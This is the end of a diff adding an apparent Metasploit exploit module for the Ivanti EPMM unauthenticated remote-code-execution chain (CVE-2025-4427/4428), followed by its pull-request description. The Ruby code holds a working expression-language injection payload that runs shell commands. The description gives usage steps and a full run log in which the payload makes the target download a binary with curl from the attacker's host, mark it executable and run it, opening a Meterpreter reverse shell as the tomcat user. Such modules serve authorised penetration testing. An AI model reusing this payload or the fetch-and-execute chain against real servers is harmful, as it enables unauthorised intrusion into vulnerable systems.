+      payload = "${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('#{command}').getInputStream()).useDelimiter('%5C%5CA').next()}"
+
+      vprint_status("Sending template payload: #{payload}")
+
+      resp = send_request_cgi(
+        'method' => 'GET',
+        # There are multiple API endpoint targets, but this works on MobileIron Core and the rebranded EPMM
+        'uri' => normalize_uri(target_uri.path, 'mifs', 'rs', 'api', 'v2', 'featureusage'),
+        'vars_get' => {
+          'format' => payload
+        },
+        # Setting this timeout lower than the default, since the third request will not receive a response
+        # Per https://github.com/rapid7/metasploit-framework/issues/12004
+        'timeout' => 7.5
+      )
+
+      # The third fetch payload command (executing meterpreter) should hang and fail to respond
+      # If there's no response and it's not the third fetch payload, the exploit failed
+      if index != 2
+        unless resp
+          fail_with(Failure::Unknown, "Failed to execute command pt #{index + 1}: #{command}")
+        end
+
+        vprint_status("Command pt #{index + 1} response: #{resp.body}")
+
+      else
+        vprint_status('No command pt 3 response expected')
+      end
+    end
+
+    resp
+  end
+
+  def exploit
+    # We pass the encoded payload to execute_command
+    # That will split it up into three commands to execute, and it'll also handle error conditions
+    vprint_status('Attempting to execute payload')
+    execute_command(payload.encoded)
+  end
+end


### PR DESCRIPTION
This module exploits an unauthenticated remote code execution exploit chain for Ivanti EPMM, tracked as [CVE-2025-4427 and CVE-2025-4428](https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM?language=en_US). An authentication flaw permits unauthenticated access to an administrator web API endpoint, which allows for code execution via expression language injection. This module executes in the context of the 'tomcat' user. This module should also work on many versions of MobileIron Core (rebranded as Ivanti EPMM).

## Verification

List the steps needed to make sure this thing works

1. Start `msfconsole`
2. `use exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428`
3. `set RHOSTS <TARGET_IP_ADDRESS>`
4. `set RPORT <TARGET_PORT>`
5. `run`

## Example usage
```
msf6 > use exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > show options 

Module options (exploit/multi/http/ivanti_epmm_rce_cve_2025_4427_4428):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        true             yes       Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to Ivanti EPMM
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST                            yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_FILELESS is false:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      EUAqTWOdJ        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Default



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set RHOSTS 192.168.181.148
RHOSTS => 192.168.181.148
msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set LHOST 192.168.181.129 
LHOST => 192.168.181.129
msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set FETCH_SRVPORT 9191
FETCH_SRVPORT => 9191
msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > set VERBOSE true
VERBOSE => true
msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > check
[*] Payload pt. 1/1: id
[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id').getInputStream()).useDelimiter('%5C%5CA').next()}
[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'."]}]}
[+] 192.168.181.148:443 - The target is vulnerable. Successfully executed command
msf6 exploit(multi/http/ivanti_epmm_rce_cve_2025_4427_4428) > run
[*] Command to run on remote host: curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw;chmod +x /var/tmp/lktEmYrRyAfw;/var/tmp/lktEmYrRyAfw&
[*] Fetch handler listening on 192.168.181.129:9191
[*] HTTP server started
[*] Adding resource /rwwkKagVT2DQx25BSXklfw
[*] Started reverse TCP handler on 192.168.181.129:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Payload pt. 1/1: id
[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('id').getInputStream()).useDelimiter('%5C%5CA').next()}
[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format 'uid=101(tomcat) gid=102(tomcat) groups=102(tomcat)\n' is invalid. Valid formats are 'json', 'csv'."]}]}
[+] The target is vulnerable. Successfully executed command
[*] Attempting to execute payload
[*] Payload pt. 1/3: curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw
[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}
[*] Client 192.168.181.148 requested /rwwkKagVT2DQx25BSXklfw
[*] Sending payload to 192.168.181.148 (curl/7.29.0)
[*] Command pt 1 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('curl -so /var/tmp/lktEmYrRyAfw http://192.168.181.129:9191/rwwkKagVT2DQx25BSXklfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'."]}]}
[*] Payload pt. 2/3: chmod +x /var/tmp/lktEmYrRyAfw
[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}
[*] Command pt 2 response: {"messages":[{"type":"Error","messageKey":"com.mobileiron.vsp.messages.validation.global.error","localizedMessage":"Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'.","messageParameters":["Format '${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('chmod +x /var/tmp/lktEmYrRyAfw').getInputStream()).useDelimiter('%5C%5CA').next()}' is invalid. Valid formats are 'json', 'csv'."]}]}
[*] Payload pt. 3/3: /var/tmp/lktEmYrRyAfw &
[*] Sending template payload: ${''.getClass().forName('java.util.Scanner').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null).exec('/var/tmp/lktEmYrRyAfw &').getInputStream()).useDelimiter('%5C%5CA').next()}
[*] Meterpreter session 1 opened (192.168.181.129:4444 -> 192.168.181.148:38980) at 2025-05-28 16:31:52 -0500
[*] No command pt 3 response expected

meterpreter > getuid 
Server username: tomcat
meterpreter > sysinfo 
Computer     : core.mobileiron.local
OS           : CentOS 7.6.1810 (Linux 3.10.0-1160.6.1.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```

I can also privately share a pcap of the exploit running. 

Thank you!